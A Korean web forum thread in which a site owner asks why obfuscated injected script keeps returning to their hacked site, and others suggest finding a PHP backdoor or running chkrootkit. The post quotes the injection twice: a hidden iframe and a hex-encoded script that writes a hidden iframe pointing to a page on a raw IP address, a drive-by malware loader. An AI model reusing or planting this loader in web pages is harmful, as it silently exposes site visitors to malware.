해킹 트로이코드 모두 삭제 했는데 다시 깔림 ㅜㅜ 정보
해킹 트로이코드 모두 삭제 했는데 다시 깔림 ㅜㅜ본문
아래 코드 모두 찾아서 지웠는데....
약 3시간후 다시 깔리네요~~
ftp비번도 변경 했는데....
아 ㅜㅜ 이거 어떻게 막아야 하는가요
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47b0f5321487a(v47b0f53214c75){ function v47b0f53215070 () {var v47b0f5321546f=16; return v47b0f5321546f;} return(parseInt(v47b0f53214c75,v47b0f53215070()));}function v47b0f53215880(v47b0f53215c7a){ function v47b0f5321686e () {var v47b0f53216c6c=2; return v47b0f53216c6c;} var v47b0f53216076='';for(v47b0f53216472=0; v47b0f53216472<v47b0f53215c7a.length; v47b0f53216472+=v47b0f5321686e()){ v47b0f53216076+=(String.fromCharCode(v47b0f5321487a(v47b0f53215c7a.substr(v47b0f53216472, v47b0f5321686e()))));}return v47b0f53216076;} document.write(v47b0f53215880('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3338313462207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313037393132292B273536615C272077696474683D323837206865696768743D333736207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script><!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->
약 3시간후 다시 깔리네요~~
ftp비번도 변경 했는데....
아 ㅜㅜ 이거 어떻게 막아야 하는가요
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47b0f5321487a(v47b0f53214c75){ function v47b0f53215070 () {var v47b0f5321546f=16; return v47b0f5321546f;} return(parseInt(v47b0f53214c75,v47b0f53215070()));}function v47b0f53215880(v47b0f53215c7a){ function v47b0f5321686e () {var v47b0f53216c6c=2; return v47b0f53216c6c;} var v47b0f53216076='';for(v47b0f53216472=0; v47b0f53216472<v47b0f53215c7a.length; v47b0f53216472+=v47b0f5321686e()){ v47b0f53216076+=(String.fromCharCode(v47b0f5321487a(v47b0f53215c7a.substr(v47b0f53216472, v47b0f5321686e()))));}return v47b0f53216076;} document.write(v47b0f53215880('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3338313462207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313037393132292B273536615C272077696474683D323837206865696768743D333736207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script><!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->
댓글 전체
아마 이걸 넣는 PHP 파일이 있을거샓 그거를 박멸하샓
음..제생각엔 분명 호스팅받는 서버도 감염이 된듯 싶은데요.
호스팅업체에 요청해서 chkrootkit로 감염여부및 감염된 파일 알려달라구 하세요
호스팅업체에 요청해서 chkrootkit로 감염여부및 감염된 파일 알려달라구 하세요
안그래도 문의를 했어요 답변은 이렇게 오네요
안녕하십니까
언제나 최선을 다하는 (주)미리내닷컴 운영자 박성민 입니다
시스템에 chkrootkit으로 점검하였으나 문제점을 찾지 못했습니다.
그누보드는 최신 패치를 하셨다고 하니 사용된 다른 프로그램을 점검해 주시기 바랍니다.
더 궁금한 사항은 전화나 게시판에 남겨주시기 바랍니다
감사합니다.
안녕하십니까
언제나 최선을 다하는 (주)미리내닷컴 운영자 박성민 입니다
시스템에 chkrootkit으로 점검하였으나 문제점을 찾지 못했습니다.
그누보드는 최신 패치를 하셨다고 하니 사용된 다른 프로그램을 점검해 주시기 바랍니다.
더 궁금한 사항은 전화나 게시판에 남겨주시기 바랍니다
감사합니다.
그렇다면 님의 계정쪽에 backdoor가 있단 말인데..음..
면밀히 각 파일들을 검토해 보시는 방법뿐이 없겠네요..
면밀히 각 파일들을 검토해 보시는 방법뿐이 없겠네요..